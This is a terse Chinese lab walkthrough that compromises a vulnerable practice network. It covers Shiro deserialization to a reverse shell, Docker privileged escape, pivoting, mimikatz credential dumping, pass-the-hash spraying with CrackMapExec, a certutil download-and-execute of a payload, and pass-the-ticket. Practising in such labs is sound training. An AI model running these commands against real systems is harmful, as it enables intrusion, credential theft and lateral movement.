由于本人是菜鸡,不会免杀,所有免杀的部分就直接跳过了
(hhh)
靶场地址:
链接: https://pan.baidu.com/s/1Fh1Zg79n1yjCPe6rrQ2apA 提取码: qiag
第一台ubuntu(docker逃逸,shiro反序列化)
fscan扫到一台机器
发现remember me,怀疑存在shiro反序列化漏洞
反弹到kali上
ls -al发现根目录有docker文件,说明我们可能在docker中
cat /proc/self/status | grep CapEff(发现存在特权逃逸)
查看目录:fdisk -l
mkdir /test && mount /dev/sda1 /test
(把原始机里面的机器移动到 /test里面)
发现了真机的目录的东西
进入里面
更改里面的密钥为自己kali主机的密钥对文件
将这个值复制到
直接ssh连接
上线msf
生成后门后,启动服务
第二种信息收集方式,frp
然后连接fscan开始扫描
第二台(通达oa)
上线msf
第一台主机建立路由
run post/multi/manage/autoroute
第三台 第四台密码喷射
hashdump导出所有的hash
或者用mimikatz导出、
两个口令
第一种:mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"
第二种:
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
CrackMapExec-密码喷射
proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth
发现有两个成功的(出现这(Pwn3d!)就表示成功的)
监听
proxychains crackmapexec smb 192.168.3.1-150 -u Administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.11/1979.exe 1979.exe & 1979.exe"
成功上线
第五台(历史ptt攻击)
未导出票据之前
导出票据:
mimikatz sekurlsa::tickets /export
查看票据:shell klist
利用票据连接:shell dir \owa2010cn-god\c$
因为可能是system或者administrator权限,所有可能连接不上,就尝试进程注入到域用户上
ps查看进程
migrate